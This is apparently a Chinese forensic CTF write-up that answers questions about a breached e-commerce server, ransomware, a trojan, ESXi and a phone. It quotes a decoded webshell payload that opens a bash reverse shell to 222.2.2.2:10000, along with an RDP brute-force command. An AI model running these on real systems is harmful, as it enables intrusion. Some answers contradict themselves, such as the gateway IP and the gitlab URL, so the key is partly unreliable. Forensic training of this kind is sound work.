三月社团赛
Practice Skills in Sunny March & CPPUISA
1. 请计算检材一(WEB.E01)镜像文件的SHA256哈希值为?
25577741A65ED32A8605BD05EBDE0CD6E255C2226CDF3A92A876D51850C8C266
2. 分析检材一,其操作系统的内核版本为?
3.10.0-514.el7.x86_64
3. 分析检材一,该服务器IP地址为?
192.168.100.100
4. 分析检材一,监听80端口的程序名称为
nginx
sudo ss -ltnp | grep :80
5. 分析检材一,mysql数据库版本号为?
5.6.50
6. 分析检材一,该网站(商城)所使用的Nginx配置文件名为?
www.tpshop.com.conf
分析里面溯源
7. 分析检材一,该服务器中宝塔面板安全入口为?
http://192.168.100.100:8888/0d85fe0b
bt 14
8. 分析检材一,该服务器中搭建了几个网站?(格式 :阿拉伯数字)
2
9. 分析检材一,被入侵的网站域名为?
www.tpshop.com
就第一个是域名形式
后来学习到可以打开宝塔网站配置文件可以知道网站域名
没有直接显示域名的也不要漏了
10. 分析检材一,被入侵网站的后台登陆URL地址为?(格式为域名+路径,比如:www.baidu.com/test)
www.tpshop.com/index.php/Admin/Admin/login.html
日志里分析,有多次GET /index.php/Admin/Admin/login.html记录,结合域名得到答案。
11. 分析检材一,攻击者的IP地址是多少?
222.2.2.2
日志里起异常请求、尝试后台登录、利用漏洞写入木马的IP均为222.2.2.2
12. 分析检材一,攻击者成功写入一句话木马的时间为?(格式:2021-01-01 21:30:01)
2022-03-04 15:15:13
13. 综合分析,攻击者对内网其他设备进行爆破所字典文件文件名为?
FastPwds.txt
想着在日志里找没找到,当时认为按理说爆破应该在本地储存字典,很疑惑,后来在esxi的渗透剂机里找,也没找到。后来学到是做了内网的横向渗透,目前能接触的机子只有web一台
,是在web的shell里爆破,要把字典传到网站上,在网站目录下找:
14. 综合分析,攻击者是利用哪条命令对内网其他设备进行爆破且成功的?
./goon2_lin -ip 192.168.100.254 -mode rdp -user administrator -pfile FastPwds.txt
(暂时没找到
15. 综合分析,爆破成功后,攻击者与内网服务器建立隧道,建立隧道的命令为?
A.bash B.telnet C.exec D.ssh
D?
复盘的时候kali坏了,估计是之前强制关了,顺便修了下
也可以在kali里面看到:
该命令会在回连服务器(222.2.2.2)上监听本地端口22222,将所有到22222端口的流量转发到内网服务器192.168.100.254的3389端口(RDP服务)。
16. 接上题,该命令建立隧道后,攻击者可以在回连服务器的哪个端口访问到内网服务?
22222
如上题
17. 据公司管理员描述,该网站运行期间一直开启着流量抓包程序,找出该数据包,其文件名为
tcpdump.cap
简单过滤常用的数据包后缀
18. 分析上述数据包,发现违法攻击者对内网IP进行扫描所使用的工具名称是?
goon2_lin
流量中提取出文件,去bt里也能看到文件
kali里也有提示
19. 分析上述数据包,黑客在检材一中使用了bash反弹shell,该反弹shell会将交互命令重定向至远端设备的哪个端口?
10000
Form item: "dbf9222af2b4dd" = "ZYY2QgIi93d3cvd3d3cm9vdC93d3cudHBzaG9wLmNvbSI7YmFzaCAtaT4mIC9kZXYvdGNwLzIyMi4yLjIuMi8xMDAwMCAwPiYxO2VjaG8gMWFmY2VhZTUwZDVhO3B3ZDtlY2hvIDk4OTY0M2Rl"
Key: dbf9222af2b4dd
Value: ZYY2QgIi93d3cvd3d3cm9vdC93d3cudHBzaG9wLmNvbSI7YmFzaCAtaT4mIC9kZXYvdGNwLzIyMi4yLjIuMi8xMDAwMCAwPiYxO2VjaG8gMWFmY2VhZTUwZDVhO3B3ZDtlY2hvIDk4OTY0M2Rl
去掉前两位解密(蚁箭
cd "/www/wwwroot/www.tpshop.com";bash -i>& /dev/tcp/222.2.2.2/10000 0>&1;echo 1afceae50d5a;pwd;echo 989643de
20. 分析检材二,其计算机名为?
WIN-CCGJNS8OESV
21. 分析检材二,攻击者成功登陆该服务器的时间为?(格式:2021-01-01 01:01:01)
2022-03-04 18:15:37
筛选4624事件ID可查看登录成功的事件:
但找到了两条登陆服务器的记录:
-第一条(LogonType=3):网络登录(如共享、远程文件访问等)。
- 第二条(LogonType=10):远程桌面登录(RDP)。
通过记载命令的文件的创建时间来辅助推断
个人觉得应该在创建了之后,逻辑上感觉没必要连上服务器后再把指令放在桌面上。那么就是第一个时间。
22. 分析检材二,用于管理检材一的远程连接工具名称为?
finalshell
23. 分析检材二,其中记录的检材一服务器的密码登录密码为?
Cse19981228
24. 分析检材二,勒索病毒程序的文件名为?
encrypt_file.exe
随便翻翻看到了
25. 分析检材二,该勒索病毒是通过哪个url链接下载的?
http://192.168.100.100/public/upload/encrypt_file.exe
26. 请分析勒索病毒会加密哪些文件扩展名的文件?
ABCD
A.doc B.jpg C.png D.txt
27. 综合分析,并尝试解密文件“销售额.txt_encrypted”,其文件内容为?
28. 警方在检材二中发现木马程序,请找到木马文件名为
exe.exe
瞎掉了没看到那么大一个exe
接下来展示ai神力
29. 请分析木马程序,该木马以什么方式实现开机自启动?
A.注册表 B.计划任务 C.服务 D.脚本
行为分析(behavior summary)和注册表监控中显示,程序执行了写入注册表启动项的操作。木马在 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\EXE 路径下写入了键值,利用 Windows Run 键实现了开机自启动(对应 MITRE ATT&CK T1547.001 / T1060 持久化攻击手法)。
30. 请分析木马程序,该程序会自动释放一配置文件,其配置文件的文件名为
http_request.json
http_request.json(或原文件 4b18b84010c6af39_http_request.json)
原因: 查看沙箱记录的释放文件(dropped files)列表,木马产生的落盘文件仅有两个:一个动态链接库载荷 x64.dll,以及一个明显为配置文件或记录请求结构的 http_request.json(放置于 %TEMP%\http_request.json)。该文件很可能是其使用的落地配置文件或是其通信时留下的序列化缓存。
31. 请分析木马程序,远程注入的模块文件名为?
x64.dll
木马在运行期间向 C:\Users\Administrator\AppData\Local\Temp\ 目录下释放了名为 x64.dll 的模块。这通常是其核心的恶意代码载荷(Payload),木马程序后续将其注入到了其他正常的系统进程中执行。
32. 请分析木马程序,被远程注入的进程数量为?
1
报告中的进程跟踪树(behavior -> processes)记录到:初始样本 EXE.exe 启动后,创建并拉起了一个系统自带的记事本进程 notepad.exe(PID:1036 / 2436),这属于木马常用的进程傀儡(Process Hollowing)或远程线程注入技术,来隐藏真实的恶意行为载体。被注入的目标进程数量有且仅有 1 个(notepad.exe)。
33. 请分析木马程序,该木马存在POST上传行为,请找出上传的目标IP
222.2.2.21
原因: 在报告的 Network(网络分析)模块中,HTTP 流量记录显示该程序对外发起了一个 POST 请求,目标 URL 为 http://222.2.2.21/upload_data,说明木马尝试将窃取的数据或主机信息上报至 IP 为 222.2.2.21 的 C2(控制)服务器。
34. 请分析木马配置文件,找出用户ID为?
zhaohong
在前面发现的配置文件中找
35. 请分析木马配置文件,尝试解密“key”字段 的明文数据为?
honglian70011111
使用base64方式解码key字段可知
36. 请分析木马配置文件,尝试解密“tag_data” 字段的明文数据为?
honglian
在配置文件中找到加密方式为AES_CBC,KEY,IV值,进行解密
37. 分析esxi虚拟化平台,其发行版本号为?
6.7.0
38. 分析esxi虚拟化平台,其内部版本号为?
8169922
39. 分析esxi虚拟化平台,其管理页面登陆URL地址为?
https://222.2.2.250/ui/#/login
40. 分析esxi虚拟化平台,/etc/exports是系统中哪个服务/程序的配置文件?
nfs
常识
41. 分析esxi虚拟化平台,其存储“datastore2”所指向的目录位置是?
/vmfs/volumes/9af41fd8-941fbcd0
42. 分析平台中的“渗透测试机”,其虚拟磁盘总容量为多少GB?
80
43. 分析平台中的“渗透测试机”,攻击者是使用什么工具获取到检材一中被入侵网站的Webshell的?
44. 分析平台中的“渗透测试机”,其网关IP是多少?
192.168.200.1
ifconfig一下就会看到是192.168.100.100
45. 分析“病毒研发机”,病毒开发者用于向gitlab提交代码的项目地址为?
http://192.168.200.1/cgi-bin/luci/admin/network/network
46. 分析“病毒研发机”,病毒开发者访问gitlab的密码为?
CLq3vWt7bbEly8fDbhSWayoFddAMOYB71s7dvydqc3k=
47. 分析“病毒研发机”,其中存在一档案系统网站,启动该网站的可执行程序名为?
WEB服务启动程序.exe
48. 接上题,该档案系统的网站后台采用哪种框架技术?
A.thinkphp B.springboot C.nodejs D.vue
B
49. 接上题,该档案系统的Mysql数据库连接密码为?
123456
50. 接上题,该档案系统后台对于账号的密码采用加盐加密,使用加密算法为?
md5
auth.userDetailsService(userService).passwordEncoder(new MessageDigestPasswordEncoder("MD5"));
jadx分析application-0.0.1-SNAPSHOT.jar
51. 接上题,在档案系统中找出财务公司被盗取的文件数量为?(格式:数字)
2
看wp似乎进数据库,结合加密逻辑改密,进了后台看到是2个。当时没没做出来
52. 接上题,该档案系统网站中,用户“zhaohong”所使用的APPID为?
zhaohong_honglian
同上题绕密进后台就可以看到
53. 分析“openwrt&wireguard”虚拟机,服务器的外网IP的后台管理地址为?
http://222.2.2.2/cgi-bin/luci/
点开openwrt&wireguard服务器内IP地址即可跳转后台地址
54. 分析“openwrt&wireguard”虚拟机,服务器的内核版本为?(格式:3.1.1)
5.4.154
uname -r
55. 分析“openwrt&wireguard”虚拟机,之前配置过,现已禁用的DDNS域名地址为?
yourhost.esirplayground.org
56. 分析“openwrt&wireguard”虚拟机,攻击者和勒索病毒开发者是通过哪种VPN协议连入内网的?
wireguard
虚拟机名称提示了(然而我没注意我是..)
57. 接上题,该服务监听哪个端口号?
12345
/etc/config/network(查看
可恶,早知道这么简单就不最后来做了,没时间做了
58. 对端设备连接“openwrt&wireguard”虚拟机提供的服务,所需使用的公钥为?
0DydALVvHHU1n+lHpVvaXqayllePKqsPRBbcVcBHLXE=
59. 分析检材5,该手机中登录的QQ账号为?
2678440406
60. 分析检材5,机主老板的虚拟币钱包地址为?
0xef9edf6cdacb7d925aee0f9bd607b544c5758850
61. 分析检材5,手机中安装了一款包名为demo.honglian的手机应用,其安装包SHA256值是?
d15c4d4a2f4dfb66872b70fe531ed680c66f36094821df946a1d6b719a49e8d2
算就完了
62. 上述应用安装后,程序名称为?
密钥获取器V1.0
略
63. 上述涉案APK的登陆用户名为?
honglian
以下三题jadx分析,APK的包名为 demo.honglian
64. 上述APK的登陆密码加密方式为?
base64
如下题
65. 上述APK的登陆密码明文为?
在DEX文件中找到Base64编码的字符串: MTIzNDU2aG9uZ2xpYW4=
解码后得到明文密码: 123456honglian
浙公网安备 33010602011771号